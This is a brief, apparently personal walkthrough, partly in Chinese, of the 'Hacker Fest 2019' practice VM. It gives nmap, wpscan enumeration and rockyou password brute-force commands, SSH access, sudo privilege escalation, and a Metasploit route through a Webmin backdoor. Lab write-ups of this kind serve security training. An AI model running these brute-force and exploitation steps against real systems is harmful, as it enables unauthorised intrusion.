Hacker Fest 2019
Description
Back to the Top
The machine was part of my workshop for Hacker Fest 2019 at Prague.
Difficulty level of this VM is very “very easy”. There are two paths for exploit it.
kali:192.168.34.153
靶机:192.168.34.162
端口扫描nmap -A -p- 192.168.34.152
发现80端口有wordpress
wpscan:wpscan --url http://192.168.34.162 -e u
暴力破解:wpscan --url http://192.168.34.162 --usernames webmaster --passwords /usr/share/wordlists/rockyou.txt
ssh连接
提权sudo -l
另一种方法;
扫描端口的时候有个10000端口webmin
是个后门
msfconsole搜索
跑一下直接就是root